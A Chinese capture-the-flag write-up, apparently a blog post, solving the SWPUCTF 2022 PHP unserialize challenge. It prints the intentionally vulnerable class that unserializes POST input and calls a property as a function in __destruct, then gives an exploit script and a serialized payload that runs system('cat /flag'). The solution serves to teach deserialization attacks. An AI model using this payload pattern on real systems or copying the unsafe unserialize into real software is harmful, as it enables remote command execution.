[SWPUCTF 2022 新生赛]1z_unserialize

题目描述:是很简单的反序列化噢

代码审计看注释

php 复制代码
<?php
 
class lyh{											//定义一个类为lyh
    public $url = 'NSSCTF.com';//公共属性,初始值为NSSCTF.com
    public $lt;									//公共属性,没有初始值
    public $lly;								//公共属性,没有初始值
     
     function  __destruct()	//__destruct()方法是php中的一个魔术方法,当对象被销毁是自动调用
     {
        $a = $this->lt;					
       //在这个方法中$a被赋值为$this->lt,然后$a($this->lly)被调用,这意味这$this->lt应给是一个
       //可以调用的函数或方法,	而$this-lly是传递给这个函数的参数

        $a($this->lly);
     }
    
    
}
unserialize($_POST['nss']);
//这行代码从POST请求中获取nss参数,并将其反序列化为php对象。反序列操作会将字符串转换回PHP对象
highlight_file(__FILE__);
 
 
?>
  1. 补充大佬的解释
  2. a($this->lly): 将 $this->lly 的值作为参数传递$a 所代表的函数。
  3. a = this->lt;a(this->lly);相当于lt(lly):很想命令执行函数+指令
  4. 所以我们可以通过构造一个恶意的序列化对象,将自定义的函数传递给lt属性,然后将要执行的代码(或指向一个恶意代码文件的路径)传递给lly属性。当对象被序列化后在被反序列化是,__destruct方法会被自动调用,从而执行指定的恶意操作。
  5. 只要传参把a变成system();,this-lly变成ls或者cat就是一个简单的命令注入了system("cat /flag");

写出php脚本exp

php 复制代码
<?php
class lyh{
   public $url = 'NSSCTF.com';
   public $lt = "system";
   public $lly = "cat /flag";
}

$sss = new lyh();
echo serialize($sss);
//O:3:"lyh":3:{s:3:"url";s:10:"NSSCTF.com";s:2:"lt";s:6:"system";s:3:"lly";s:9:"cat /flag";}

POST传参nss=O:3:"lyh":3:{s:3:"url";s:10:"NSSCTF.com";s:2:"lt";s:6:"system";s:3:"lly";s:9:"cat /flag";}

相关推荐
Yungoal5 小时前
php & apache构建 Web 服务器
服务器·php·apache
浩浩测试一下5 小时前
Authpf(OpenBSD)认证防火墙到ssh连接到SSH端口转发技术栈 与渗透网络安全的关联 (RED Team Technique )
网络·网络协议·tcp/ip·安全·网络安全·php
孤寂大仙v6 小时前
【计算机网络】网络层IP协议与子网划分详解:从主机通信到网络设计的底层逻辑
tcp/ip·计算机网络·php
vortex511 小时前
浅谈 Linux 防火墙:从原理到实践
linux·网络·php
come1123411 小时前
Claude 写 PHP 项目的完整小白教程
开发语言·php
Bruce_Liuxiaowei18 小时前
PHP文件读取漏洞全面剖析:触发点与利用技术
开发语言·php
hopetomorrow19 小时前
学习路之PHP--webman安装及使用
android·学习·php
链上Sniper1 天前
Python 区块链开发实战:从零到一构建智能合约
开发语言·网络·python·架构·区块链·php·智能合约
链上Sniper2 天前
智能合约安全漏洞解析:从 Reentrancy 到 Integer Overflow
开发语言·网络·架构·区块链·php·智能合约
链上Sniper2 天前
高并发区块链系统实战:从架构设计到性能优化
开发语言·网络·python·性能优化·架构·区块链·php